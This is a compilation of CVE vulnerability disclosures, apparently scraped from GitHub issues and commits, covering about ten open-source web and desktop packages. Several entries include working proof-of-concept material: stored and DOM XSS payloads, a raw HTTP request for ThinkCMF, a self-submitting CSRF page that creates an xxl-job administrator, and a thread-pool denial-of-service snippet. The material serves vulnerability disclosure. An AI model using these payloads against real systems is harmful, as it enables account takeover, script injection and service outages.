An issue was discovered in FoldingAtHome Client Advanced Control GUI before commit 9b619ae64443997948a36dda01b420578de1af77, allows remote attackers to execute arbitrary code via crafted payload to function parse_message in file Connection.py.

@@ -0,0 +1,216 @@ ################################################################################ \# # \# Folding@Home Client Control (FAHControl) # \# Copyright (C) 2016-2020 foldingathome.org # \# Copyright (C) 2010-2016 Stanford University # \# # \# This program is free software: you can redistribute it and/or modify # \# it under the terms of the GNU General Public License as published by # \# the Free Software Foundation, either version 3 of the License, or # \# (at your option) any later version. # \# # \# This program is distributed in the hope that it will be useful, # \# but WITHOUT ANY WARRANTY; without even the implied warranty of # \# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # \# GNU General Public License for more details. # \# # \# You should have received a copy of the GNU General Public License # \# along with this program. If not, see <http://www.gnu.org/licenses/>. # \# # ################################################################################  
import re import json import sys  
  
NUMBER\_RE \= re.compile(r'(-?(?:0|\[1-9\]\\d\*))(\\.\\d+)?(\[eE\]\[-+\]?\\d+)?', (re.VERBOSE | re.MULTILINE | re.DOTALL)) FLAGS \= re.VERBOSE | re.MULTILINE | re.DOTALL STRINGCHUNK \= re.compile(r'(.\*?)(\["\\\\\\x00-\\x1f\])', FLAGS) BACKSLASH \= { '"': u'"', '\\\\': u'\\\\', '/': u'/', 'b': u'\\b', 'f': u'\\f', 'n': u'\\n', 'r': u'\\r', 't': u'\\t', }  
DEFAULT\_ENCODING \= "utf-8"  
  
def linecol(doc, pos): lineno \= doc.count('\\n', 0, pos) + 1 if lineno \== 1: colno \= pos + 1 else: colno \= pos \- doc.rindex('\\n', 0, pos) return lineno, colno  
  
def errmsg(msg, doc, pos, end\=None): \# Note that this function is called from \_json lineno, colno \= linecol(doc, pos) if end is None: fmt \= '{0}: line {1} column {2} (char {3})' return fmt.format(msg, lineno, colno, pos)  
endlineno, endcolno \= linecol(doc, end) fmt \= '{0}: line {1} column {2} - line {3} column {4} (char {5} - {6})' return fmt.format(msg, lineno, colno, endlineno, endcolno, pos, end)  
  
def \_decode\_uXXXX(s, pos): esc \= s\[pos + 1:pos + 5\]  
if len(esc) \== 4 and esc\[1\] not in 'xX': try: return int(esc, 16) except ValueError: pass  
msg \= "Invalid \\\\uXXXX escape" raise ValueError(errmsg(msg, s, pos))  
  
def pyon\_scanstring(s, end, encoding \= None, strict \= True, \_b \= BACKSLASH, \_m \= STRINGCHUNK.match): """Scan the string s for a JSON string. End is the index of the character in s after the quote that started the JSON string. Unescapes all valid JSON string escape sequences and raises ValueError on attempt to decode an invalid string. If strict is False then literal control characters are allowed in the string. Returns a tuple of the decoded string and the index of the character in s after the end quote.""" if encoding is None: encoding \= DEFAULT\_ENCODING chunks \= \[\] \_append \= chunks.append begin \= end \- 1  
while True: chunk \= \_m(s, end) if chunk is None: raise ValueError( errmsg("Unterminated string starting at", s, begin))  
end \= chunk.end() content, terminator \= chunk.groups()  
\# Content is contains zero or more unescaped string characters if content: if not isinstance(content, unicode): content \= unicode(content, encoding) \_append(content)  
\# Terminator is the end of string, a literal control character, \# or a backslash denoting that an escape sequence follows if terminator \== '"': break elif terminator != '\\\\': if strict: msg \= "Invalid control character {0!r} at".format(terminator) raise ValueError(errmsg(msg, s, end)) else: \_append(terminator) continue  
try: esc \= s\[end\] except IndexError: raise ValueError(errmsg("Unterminated string starting at", s, begin))  
\# If not a unicode escape sequence, must be in the lookup table if esc != 'u' and esc != 'x': try: char \= \_b\[esc\] except KeyError: msg \= "Invalid \\\\escape: " + repr(esc) raise ValueError(errmsg(msg, s, end)) end += 1  
elif esc \== 'x': \# Hex escape sequence try: code \= s\[end + 1: end + 3\] char \= code.decode('hex') except: raise ValueError(errmsg('Invalid \\\\escape: ' + repr(code), s, end))  
end += 3  
else: \# Unicode escape sequence uni \= \_decode\_uXXXX(s, end) end += 5 \# Check for surrogate pair on UCS-4 systems if sys.maxunicode \> 65535 and \\ 0xd800 <= uni <= 0xdbff and s\[end:end + 2\] \== '\\\\u': uni2 \= \_decode\_uXXXX(s, end + 1) if 0xdc00 <= uni2 <= 0xdfff: uni \= 0x10000 + (((uni \- 0xd800) << 10) | (uni2 \- 0xdc00)) end += 6 char \= unichr(uni)  
\# Append the unescaped character \_append(char)  
return u''.join(chunks), end  
  
  
def make\_pyon\_scanner(context): parse\_object \= context.parse\_object parse\_array \= context.parse\_array parse\_string \= context.parse\_string match\_number \= NUMBER\_RE.match strict \= context.strict parse\_float \= context.parse\_float parse\_int \= context.parse\_int parse\_constant \= context.parse\_constant object\_hook \= context.object\_hook object\_pairs\_hook \= context.object\_pairs\_hook  
  
def scan\_once(string, idx): try: nextchar \= string\[idx\] except IndexError: raise StopIteration(idx)  
if nextchar \== '"': return parse\_string(string, idx + 1, 'utf-8', strict) elif nextchar \== '{': return parse\_object((string, idx + 1), 'utf-8', strict, scan\_once, object\_hook, object\_pairs\_hook) elif nextchar \== '\[': return parse\_array((string, idx + 1), scan\_once) elif nextchar \== 'N' and string\[idx:idx + 4\] \== 'None': return None, idx + 4 elif nextchar \== 'T' and string\[idx:idx + 4\] \== 'True': return True, idx + 4 elif nextchar \== 'F' and string\[idx:idx + 5\] \== 'False': return False, idx + 5  
m \= match\_number(string, idx) if m is not None: integer, frac, exp \= m.groups() if frac or exp: res \= parse\_float(integer + (frac or '') + (exp or '')) else: res \= parse\_int(integer)  
return res, m.end()  
elif nextchar \== 'N' and string\[idx:idx + 3\] \== 'NaN': return parse\_constant('NaN'), idx + 3  
elif nextchar \== 'I' and string\[idx:idx + 8\] \== 'Infinity': return parse\_constant('Infinity'), idx + 8  
elif nextchar \== '-' and string\[idx:idx + 9\] \== '-Infinity': return parse\_constant('-Infinity'), idx + 9  
else: raise StopIteration(idx)  
  
return scan\_once  
  
class PYONDecoder(json.JSONDecoder): def \_\_init\_\_(self, \*args, \*\*kwargs): json.JSONDecoder.\_\_init\_\_(self, \*args, \*\*kwargs) self.parse\_string \= pyon\_scanstring self.scan\_once \= make\_pyon\_scanner(self)

CVE-2020-27544: Use PYONDecoder instead of eval() · FoldingAtHome/fah-control@9b619ae

Buffer Overflow vulnerability in jpgfile.c in Matthias-Wandel jhead version 3.04, allows local attackers to execute arbitrary code and cause a denial of service (DoS).

**Impact**

fuzzer&poc1.zip

    fstark@fstark-virtual-machine:~/jhead-master$ ./jhead afl_collect_output_dir/fuzz1\:id\:000013\,sig\:06\,src\:000263\,time\:295896\,op\:arith8\,pos\:8\,val\:+15 
    =================================================================
    ==4212==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200000eff4 at pc 0x0000004bd123 bp 0x7ffd6e2fdb80 sp 0x7ffd6e2fdb70
    READ of size 1 at 0x60200000eff4 thread T0
        #0 0x4bd122 in process_COM /home/fstark/jhead-master/jpgfile.c:51
        #1 0x4be667 in ReadJpegSections /home/fstark/jhead-master/jpgfile.c:240
        #2 0x4bfbad in ReadJpegSections /home/fstark/jhead-master/jpgfile.c:125
        #3 0x4bfbad in ReadJpegFile /home/fstark/jhead-master/jpgfile.c:378
        #4 0x4b71bb in ProcessFile /home/fstark/jhead-master/jhead.c:905
        #5 0x4066dc in main /home/fstark/jhead-master/jhead.c:1756
        #6 0x7f3dc850083f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2083f)
        #7 0x40a1e8 in _start (/home/fstark/jhead-master/jhead+0x40a1e8)
    
    0x60200000eff4 is located 0 bytes to the right of 4-byte region [0x60200000eff0,0x60200000eff4)
    allocated by thread T0 here:
        #0 0x485392 in malloc (/home/fstark/jhead-master/jhead+0x485392)
        #1 0x4bd558 in ReadJpegSections /home/fstark/jhead-master/jpgfile.c:172
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow /home/fstark/jhead-master/jpgfile.c:51 process_COM
    Shadow bytes around the buggy address:
      0x0c047fff9da0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff9db0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff9dc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff9dd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff9de0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    =>0x0c047fff9df0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa[04]fa
      0x0c047fff9e00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff9e10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff9e20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff9e30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff9e40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Heap right redzone:      fb
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack partial redzone:   f4
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
    ==4212==ABORTING
    

**Patches**

Fixed by 4827ed3  
Matthias-Wandel@4827ed3

**References**

Matthias-Wandel#8  
Matthias-Wandel@4827ed3

CVE-2020-28840: heap-buffer-overflow on process_COM in jpgfile.c:51

Directory Traversal vulnerability in delete function in admin.api.TemplateController in ZrLog version 2.1.15, allows remote attackers to delete arbitrary files and cause a denial of service (DoS).

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Pick a username

Email Address

Password

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CVE-2020-27514: Arbitrary File Deletion Vulnerability in com.zrlog.web.controller.admin.api.TemplateController#delete · Issue #66 · 94fzb/zrlog

Cross Site Scripting (XSS) vulnerability in content1 parameter in demo.jsp in kindsoft kindeditor version 4.1.12, allows attackers to execute arbitrary code.

CVE-2020-28717: XSS vulnerability in demo.jsp · Issue #321 · kindsoft/kindeditor

Cross Site Scripting (XSS) vulnerability in UserController.php in ThinkCMF version 5.1.5, allows attackers to execute arbitrary code via crafted user_login.

At vendor/thinkcmf/cmf-app/src/admin/controller/UserController.php

There is no filtering of the user's post requests.

For example:

line 138:

$result             = DB::name('user')->insertGetId($_POST);

line 221:  
$result = DB::name('user')->update($_POST);

So There is a Stored XSS vulnerability in user management,

POC:

    POST /admin/user/addpost.html HTTP/1.1
    Host: test.net
    Connection: close
    Content-Length: 115
    Accept: application/json, text/javascript, */*; q=0.01
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: https://test.net
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: https://test.net/admin/user/add.html
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
    Cookie: thinkphp_show_page_trace=0|0; admin_username=admin; PHPSESSID=ju91k4c4do16sl2qqac553edl1
    
    user_login=%3Cimg+src%3D''+onerror%3Dalert(%2Fxss%2F)%3E&user_pass=123456&user_email=1111%40qqq.com&role_id%5B%5D=2

CVE-2020-25915: There is a store Stored XSS vulnerability in user management · Issue #675 · thinkcmf/thinkcmf

Cross Site Scripting (XSS) vulnerability in adm_user parameter in Gila CMS version 1.11.3, allows remote attackers to execute arbitrary code during the Gila CMS installation.

**XSS on Gila CMS Installation**

**Gila CMS version 1.11.3**

1: Admin Username

<input name="adm_user" placeholder="Your Name" required="">

adm\_user

/install/install.sql.php

    $_user=$_POST['adm_user'];
    $_email=$_POST['adm_email'];
    $_pass=password_hash($_POST['adm_pass'], PASSWORD_BCRYPT);
    
    $link->query("INSERT INTO userrole(id,userrole) VALUES(1,'Admin');");
    $link->query("INSERT INTO user(id,username,email,pass,active,reset_code) VALUES(1,'$_user','$_email','$_pass',1,'');");
    

2:Login in admin pane

XSS

Visit the website

3:Reference

https://www.owasp.org/index.php/Cross-site\_Scripting\_(XSS)

CVE-2020-20523: XSS on Gila CMS Installation · Issue #41 · GilaCMS/gila

Cross Site Scripting (XSS) vulnerability in Query Report feature in Zoho ManageEngine Password Manager Pro version 11001, allows remote attackers to execute arbitrary code and steal cookies via crafted JavaScript payload.

CVE-2020-27449: Release Notes - ManageEngine Password Manager Pro

Cross Site Scripting (XSS) vulnerability in margox braft-editor version 2.3.8, allows remote attackers to execute arbitrary code via the embed media feature.

Dear Author,  
I’m testivy. I found that the current version of braft-editor has a a cross-site scripting (XSS) allows remote attackers to run arbitrary web script inside an div embed media element by injecting a crafted HTML element into the editor.  
As the offical demo site shown:  
https://braft.margox.cn/demos/basic  
or  
https://braft.margox.cn/  
  
When I come to the media library toolbar and choose the "adding network network resources " button below,and then select the embed media item as the figure shown below:  
  

****Loopholes Reproduce****

1.  Inject a crafted HTML element into the editor just like this  
    <img/src=1 onerror=alert(1)>
2.  Click the insert button  
    
3.  Click the play button to play the inserted video in this editor
4.  View the page and you will see a pop-up which running the arbitrary web script inside.  
    

****Vulnerability details****

This problem mainly occurs in braft-editor/src/renderers/atomics/Embed/index.jsx 

    return (
        <div className="bf-embed-wrap">
          <PlayerModal
            type="embed"
            onRemove={removeEmbed}
            poster={meta ? meta.poster || '' : ''}
            language={language}
            url={url}
            name={name}
            title={language.videoPlayer.embedTitle}
          >
            <div
              className="bf-embed-player"
              dangerouslySetInnerHTML={{ __html: url }}
            />
          </PlayerModal>
        </div>
    

As we can see, the above dangerouslySetInnerHTML ,this accept the url variable from the input without escape that could lead to run the arbitrary code even stealing the user's cookie. .etc.  
If we input the simple script like "<img/src=1 onerror=alert(1)>",the brower will render it to the html as below:  
<div class="bf-embed-player"><img src="1" onerror="alert(1)"></div> and finally pop a alert window.

Best Regards

CVE-2021-27524: Report a cross-site scripting (XSS)  security vulnerability in the braft-editor  allowing remote attackers to run arbitrary web script inside an div embed media element by injecting a crafted HTML ele

Cross Site Request Forgery (CSRF) vulnerability in xxl-job-admin/user/add in xuxueli xxl-job version 2.2.0, allows remote attackers to execute arbitrary code and esclate privileges via crafted .html file.

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Open

devi1syd opened this issue

Aug 22, 2020

· 0 comments

**Comments**

After the administrator logged in, open the following a page  
poc：  
one.html---add a admin

    <html><body>
    <script type="text/javascript">
    function post(url,fields)
    {
    var p = document.createElement("form");
    p.action = url;
    p.innerHTML = fields;
    p.target = "_self";
    p.method = "post";
    document.body.appendChild(p);
    p.submit();
    }
    function csrf_hack()
    {
    var fields;
    
    fields += "<input type='hidden' name='username' value='test1' />";
    fields += "<input type='hidden' name='password' value='test1' />";  
    fields += "<input type='hidden' name='role'    value='0' />";  
    fields += "<input type='hidden' name='permission' value='1' />";  
    
    
    var url = "http://172. 18.71.41:8090/xxl-job-admin/user/add";
    post(url,fields);
    }
    window.onload = function() { csrf_hack();}
    </script>
    </body></html>
    

1 participant

CVE-2020-24922: There is a CSRF vulnerability that can add the administrator account · Issue #1921 · xuxueli/xxl-job

An issue was discovered in StaticPool in SUCHMOKUO node-worker-threads-pool version 1.4.3, allows attackers to cause a denial of service.

I've read a bit of the code.  
And I believe I've found a vulnerability:  
For example consider this:

    const { StaticPool } = require("node-worker-threads-pool");
    
    const staticPool = new StaticPool({
      size: 1,
      task: (n) => {while(n){console.log("a");}
    return n;
    },
    timeout:10
    });
    staticPool.exec(0).then((result) => {
      console.log("result from thread pool:", result); // result will be 0.
    });
    staticPool.exec(1).then((result) => {
      console.log("result from thread pool:", result); //will never return
    });
    staticPool.exec(0).then((result) => {
      console.log("result from thread pool:", result); // will never be executed
    });
    

The worker thread is now will be hijacked till node restart in the malicious task which never ends.  
Moreover the library never says to the user that something went wrong.  
The process will keep running, with the exhausted poll (the attacker only need to make sure that he sends as much tasks as available workers).  
In dynamic pool, attacker might cause a server CPU runout.  
For summary:  
The user which tries to protect its process from an expensive task taking down its service, might be tricked to use timeout feature, which supposedly guarantees that this never happens.  
The attacker only need to find a case where task is expensive to compute (for example an edge case of regex).  
The threads are hijacked to the expensive case, leading to a potential DDOS.  
The user is never informed that something went wrong, while the pool never executes following tasks.

Source

CVE